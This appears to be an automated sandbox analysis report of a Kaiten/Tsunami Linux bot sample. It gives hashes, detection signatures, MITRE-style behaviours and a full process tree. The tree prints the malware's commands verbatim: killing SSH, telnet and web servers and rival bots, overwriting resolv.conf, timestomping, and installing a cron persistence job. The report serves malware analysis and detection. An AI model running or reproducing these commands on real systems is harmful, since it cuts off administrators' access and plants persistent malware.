Analysis
-
max time kernel
50s -
max time network
143s -
platform
debian-12_armhf -
resource
debian12-armhf-20240729-en -
resource tags
arch:armhfimage:debian12-armhf-20240729-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem -
submitted
18-09-2024 21:39
Static task
static1
Behavioral task
behavioral1
Sample
ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118
Resource
debian12-armhf-20240729-en
General
-
Target
ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118
-
Size
42KB
-
MD5
ea047bc4ae766b32a0c80b85b39f140b
-
SHA1
9dea25da47ba31c2b93d2f7cf2ac67e0259885e4
-
SHA256
aa62d2f1c7770196da0af32bf98b270197f4199927b2d9309e62ea57a9a59161
-
SHA512
f02e19e3dad16c04826cd2eb639788b931fdcdb1d833547addcbcce5f6f699788b57d42095427c811b3d15574a4f3ce9db487fbaff32dd08d68e13c617eb36cf
-
SSDEEP
768:qSV8OVcRm9+kyUW0+551sPbomVIys5q67DTka6SIejwiSJK3UEg6:5VZcE9XWx8UX5q6Z6aHg6
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
resource yara_rule behavioral1/memory/707-1-0x00008000-0x0002c598-memory.dmp family_kaiten2 -
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
description ioc Process File opened for modification /etc/resolv.conf sh -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.hMLEbR crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Indicator Removal: Timestomp 1 TTPs 2 IoCs
Adversaries may remove indicators of compromise from the host to evade detection.
pid Process 801 sh 802 touch -
description ioc Process File opened for reading /proc/143/cmdline killall File opened for reading /proc/17/stat killall File opened for reading /proc/879 killall File opened for reading /proc/143 killall File opened for reading /proc/19 killall File opened for reading /proc/25/stat killall File opened for reading /proc/32/stat killall File opened for reading /proc/207 killall File opened for reading /proc/187 killall File opened for reading /proc/33/stat killall File opened for reading /proc/625 killall File opened for reading /proc/28 killall File opened for reading /proc/142 killall File opened for reading /proc/362/stat killall File opened for reading /proc/10/stat killall File opened for reading /proc/142 killall File opened for reading /proc/354/stat killall File opened for reading /proc/35/stat killall File opened for reading /proc/15/stat killall File opened for reading /proc/26 killall File opened for reading /proc/345/stat killall File opened for reading /proc/207 killall File opened for reading /proc/10 killall File opened for reading /proc/8/stat killall File opened for reading /proc/652/stat killall File opened for reading /proc/301 killall File opened for reading /proc/354 killall File opened for reading /proc/718 killall File opened for reading /proc/344/stat killall File opened for reading /proc/17 killall File opened for reading /proc/25 killall File opened for reading /proc/6 killall File opened for reading /proc/338 killall File opened for reading /proc/718 killall File opened for reading /proc/855/stat killall File opened for reading /proc/345/stat killall File opened for reading /proc/10/stat killall File opened for reading /proc/22/stat killall File opened for reading /proc/143/stat killall File opened for reading /proc/34/stat killall File opened for reading /proc/704/stat killall File opened for reading /proc/718/stat killall File opened for reading /proc/708 killall File opened for reading /proc/45 killall File opened for reading /proc/853/stat killall File opened for reading /proc/42 killall File opened for reading /proc/187/stat killall File opened for reading /proc/873/stat killall File opened for reading /proc/27/stat killall File opened for reading /proc/4 killall File opened for reading /proc/350/stat killall File opened for reading /proc/73/stat killall File opened for reading /proc/25 killall File opened for reading /proc/33/stat killall File opened for reading /proc/4 killall File opened for reading /proc/213/stat killall File opened for reading /proc/362 killall File opened for reading /proc/12 killall File opened for reading /proc/636/stat killall File opened for reading /proc/862/stat killall File opened for reading /proc/20/stat killall File opened for reading /proc/12 killall File opened for reading /proc/4 killall File opened for reading /proc/681/stat killall -
System Network Configuration Discovery 1 TTPs 8 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 783 sh 782 killall 784 killall 761 sh 764 sh 763 killall 766 killall 780 sh
Processes
-
/tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118/tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes1181⤵PID:707
-
/bin/shsh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"2⤵PID:710
-
-
/bin/shsh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"2⤵PID:713
-
-
/bin/shsh -c "rm -rf /var/run/tty0 > /dev/null 2>&1 &"2⤵PID:717
-
-
/bin/shsh -c "rm -rf /var/run/tty1 > /dev/null 2>&1 &"2⤵PID:723
-
-
/bin/shsh -c "rm -rf /var/run/tty2 > /dev/null 2>&1 &"2⤵PID:726
-
-
/bin/shsh -c "rm -rf /var/run/tty3 > /dev/null 2>&1 &"2⤵PID:729
-
-
/bin/shsh -c "rm -rf /var/run/tty4 > /dev/null 2>&1 &"2⤵PID:732
-
-
/bin/shsh -c "rm -rf /var/run/tty5 > /dev/null 2>&1 &"2⤵PID:735
-
-
/bin/shsh -c "rm -rf /tmp/tty0 > /dev/null 2>&1 &"2⤵PID:737
-
-
/bin/shsh -c "rm -rf /tmp/tty1 > /dev/null 2>&1 &"2⤵PID:740
-
-
/bin/shsh -c "rm -rf /tmp/tty2 > /dev/null 2>&1 &"2⤵PID:743
-
-
/bin/shsh -c "rm -rf /tmp/tty3 > /dev/null 2>&1 &"2⤵PID:746
-
-
/bin/shsh -c "rm -rf /tmp/tty4 > /dev/null 2>&1 &"2⤵PID:749
-
-
/bin/shsh -c "rm -rf /tmp/tty5 > /dev/null 2>&1 &"2⤵PID:752
-
-
/bin/shsh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"2⤵PID:756
-
-
/bin/shsh -c "killall -9 arm > /dev/null 2>&1 &"2⤵PID:759
-
-
/bin/shsh -c "killall -9 mips > /dev/null 2>&1 &"2⤵
- System Network Configuration Discovery
PID:761
-
-
/bin/shsh -c "killall -9 mipsel > /dev/null 2>&1 &"2⤵
- System Network Configuration Discovery
PID:764
-
-
/bin/shsh -c "killall -9 powerpc > /dev/null 2>&1 &"2⤵PID:767
-
-
/bin/shsh -c "killall -9 ppc > /dev/null 2>&1 &"2⤵PID:769
-
-
/bin/shsh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"2⤵PID:772
-
-
/bin/shsh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"2⤵PID:775
-
-
/bin/shsh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"2⤵
- System Network Configuration Discovery
PID:780
-
-
/bin/shsh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"2⤵
- System Network Configuration Discovery
PID:783
-
-
/bin/shsh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"2⤵PID:785
-
/usr/bin/catcat "/tmp/.xs/*.pid"3⤵PID:790
-
-
-
/bin/shsh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"2⤵PID:789
-
-
/bin/shsh -c "sleep 432000 && reboot &"2⤵PID:793
-
/usr/bin/sleepsleep 4320003⤵PID:797
-
-
-
/bin/shsh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"2⤵
- Writes DNS configuration
PID:796
-
-
/bin/shsh -c "chmod 700 /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118 > /dev/null 2>&1 &"2⤵PID:799
-
-
/bin/shsh -c "touch -acmr /bin/ls /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118"2⤵
- Indicator Removal: Timestomp
PID:801 -
/usr/bin/touchtouch -acmr /bin/ls /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes1183⤵
- Indicator Removal: Timestomp
PID:802
-
-
-
/bin/shsh -c "(crontab -l | grep -v \"/tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"2⤵PID:806
-
/usr/bin/crontabcrontab -l3⤵PID:809
-
-
/usr/bin/grepgrep -v /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes1183⤵PID:811
-
-
/usr/bin/grepgrep -v "no cron"3⤵PID:812
-
-
/usr/bin/grepgrep -v lesshts/run.sh3⤵PID:813
-
-
-
/bin/shsh -c "echo \"* * * * * /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118 > /dev/null 2>&1 &\" >> /var/run/.x001804289383"2⤵PID:818
-
-
/bin/shsh -c "crontab /var/run/.x001804289383"2⤵PID:822
-
/usr/bin/crontabcrontab /var/run/.x0018042893833⤵
- Creates/modifies Cron job
PID:823
-
-
-
/bin/shsh -c "rm -rf /var/run/.x001804289383"2⤵PID:824
-
/usr/bin/rmrm -rf /var/run/.x0018042893833⤵PID:825
-
-
-
/bin/shsh -c "/bin/uname -n"2⤵PID:826
-
/bin/uname/bin/uname -n3⤵PID:827
-
-
-
/bin/shsh -c "/bin/uname -n"2⤵PID:828
-
/bin/uname/bin/uname -n3⤵PID:829
-
-
-
/bin/shsh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"2⤵PID:838
-
/usr/bin/catcat /var/run/httpd.pid3⤵PID:841
-
-
-
/bin/shsh -c "service httpd stop > /dev/null 2>&1 &"2⤵PID:840
-
-
/bin/shsh -c "killall -9 mini_httpd > /dev/null 2>&1 &"2⤵PID:843
-
-
/bin/shsh -c "killall -9 minihttpd > /dev/null 2>&1 &"2⤵PID:845
-
-
/bin/shsh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"2⤵PID:849
-
/usr/bin/catcat /var/run/thttpd.pid3⤵PID:852
-
-
-
/bin/shsh -c "nvram set httpd_enable=0 > /dev/null 2>&1"2⤵PID:851
-
-
/bin/shsh -c "nvram set http_enable=0 > /dev/null 2>&1"2⤵PID:856
-
-
/bin/shsh -c "killall -9 httpd > /dev/null 2>&1 &"2⤵PID:857
-
-
/bin/shsh -c "service telnetd stop > /dev/null 2>&1 &"2⤵PID:859
-
-
/bin/shsh -c "service sshd stop > /dev/null 2>&1 &"2⤵PID:861
-
-
/bin/shsh -c "killall -9 telnetd > /dev/null 2>&1 &"2⤵PID:863
-
-
/bin/shsh -c "killall -9 utelnetd > /dev/null 2>&1 &"2⤵PID:867
-
-
/bin/shsh -c "killall -9 dropbear > /dev/null 2>&1 &"2⤵PID:871
-
-
/bin/shsh -c "killall -9 sshd > /dev/null 2>&1 &"2⤵PID:876
-
-
/bin/shsh -c "killall -9 lighttpd > /dev/null 2>&1 &"2⤵PID:881
-
-
/usr/bin/rmrm -rf /var/run/wgsh1⤵PID:712
-
/usr/bin/rmrm -rf /var/run/bbsh1⤵PID:716
-
/usr/bin/rmrm -rf /var/run/tty01⤵PID:722
-
/usr/bin/rmrm -rf /var/run/tty11⤵PID:725
-
/usr/bin/rmrm -rf /var/run/tty21⤵PID:728
-
/usr/bin/rmrm -rf /var/run/tty31⤵PID:731
-
/usr/bin/rmrm -rf /var/run/tty41⤵PID:734
-
/usr/bin/rmrm -rf /var/run/tty51⤵PID:736
-
/usr/bin/rmrm -rf /tmp/tty01⤵PID:739
-
/usr/bin/rmrm -rf /tmp/tty11⤵PID:742
-
/usr/bin/rmrm -rf /tmp/tty21⤵PID:745
-
/usr/bin/rmrm -rf /tmp/tty31⤵PID:747
-
/usr/bin/rmrm -rf /tmp/tty41⤵PID:751
-
/usr/bin/rmrm -rf /tmp/tty51⤵PID:754
-
/usr/bin/rmrm -rf /var/run/pty1⤵PID:758
-
/usr/bin/killallkillall -9 arm1⤵
- Reads runtime system information
PID:760
-
/usr/bin/killallkillall -9 mips1⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:763
-
/usr/bin/killallkillall -9 mipsel1⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:766
-
/usr/bin/killallkillall -9 powerpc1⤵
- Reads runtime system information
PID:768
-
/usr/bin/killallkillall -9 ppc1⤵
- Reads runtime system information
PID:771
-
/usr/bin/killallkillall -9 daemon.armv4l.mod1⤵
- Reads runtime system information
PID:774
-
/usr/bin/killallkillall -9 daemon.i686.mod1⤵
- Reads runtime system information
PID:779
-
/usr/bin/killallkillall -9 daemon.mips.mod1⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:782
-
/usr/bin/killallkillall -9 daemon.mipsel.mod1⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:784
-
/usr/bin/rmrm -rf "/tmp/.xs/*"1⤵PID:792
-
/usr/bin/chmodchmod 700 /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes1181⤵PID:800
-
/usr/sbin/serviceservice httpd stop1⤵PID:842
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:846
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:847
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"2⤵PID:854
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"2⤵PID:855
-
-
/usr/bin/killallkillall -9 mini_httpd1⤵
- Reads runtime system information
PID:844
-
/usr/bin/killallkillall -9 minihttpd1⤵
- Reads runtime system information
PID:848
-
/usr/bin/killallkillall -9 httpd1⤵
- Reads runtime system information
PID:858
-
/usr/sbin/serviceservice telnetd stop1⤵PID:860
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:864
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:865
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"2⤵PID:873
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"2⤵PID:874
-
-
/usr/sbin/serviceservice sshd stop1⤵PID:862
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:868
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:869
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"2⤵PID:878
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"2⤵PID:879
-
-
/usr/bin/killallkillall -9 telnetd1⤵
- Reads runtime system information
PID:866
-
/usr/bin/killallkillall -9 utelnetd1⤵
- Reads runtime system information
PID:870
-
/usr/bin/killallkillall -9 dropbear1⤵
- Reads runtime system information
PID:875
-
/usr/bin/killallkillall -9 sshd1⤵
- Reads runtime system information
PID:880
-
/usr/bin/killallkillall -9 lighttpd1⤵
- Reads runtime system information
PID:882
-
/usr/local/sbin/systemctlsystemctl stop httpd.service1⤵PID:842
-
/usr/local/bin/systemctlsystemctl stop httpd.service1⤵PID:842
-
/usr/sbin/systemctlsystemctl stop httpd.service1⤵PID:842
-
/usr/bin/systemctlsystemctl stop httpd.service1⤵PID:842
-
/usr/local/sbin/systemctlsystemctl stop sshd.service1⤵PID:862
-
/usr/local/bin/systemctlsystemctl stop sshd.service1⤵PID:862
-
/usr/sbin/systemctlsystemctl stop sshd.service1⤵PID:862
-
/usr/bin/systemctlsystemctl stop sshd.service1⤵PID:862
-
/usr/local/sbin/systemctlsystemctl stop telnetd.service1⤵PID:860
-
/usr/local/bin/systemctlsystemctl stop telnetd.service1⤵PID:860
-
/usr/sbin/systemctlsystemctl stop telnetd.service1⤵PID:860
-
/usr/bin/systemctlsystemctl stop telnetd.service1⤵PID:860
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
81B
MD5d2b7a2f7941354785f0e99d533666de0
SHA1c04d282f084b0f701c858ea04ea8f18b1a2839c0
SHA256a4859f9d584e68c2f7c2d9727eda8c9a1a34ac37a1c8daf90359a977eb197e3b
SHA5125397b4b1d7f87b28db24c74e6001ce758300daef7cda117e4a325573a615d20ad85cb8d574944dd6be8c726b05a50c3e169fae1ed0a1f564ef2bf8a6be5fe685
-
Filesize
278B
MD50c9e51d7885bd5a746c4548dbef06a82
SHA1d0cd9555ac8dcb4faaaff1eb4297f0153f65f835
SHA256f2d79581927ac4a56d68057241a734afe0a7e5dd82912fe7fb96cccae9a8f46c
SHA512c4895f09a41a36a7eb0f65df06438ef99e9aa89ec040eca01c952e5642471ac47864a0f19fbb4ca62de8c468104eb8bcd64bb9df36b5bd99aa3e950bd4e83bd6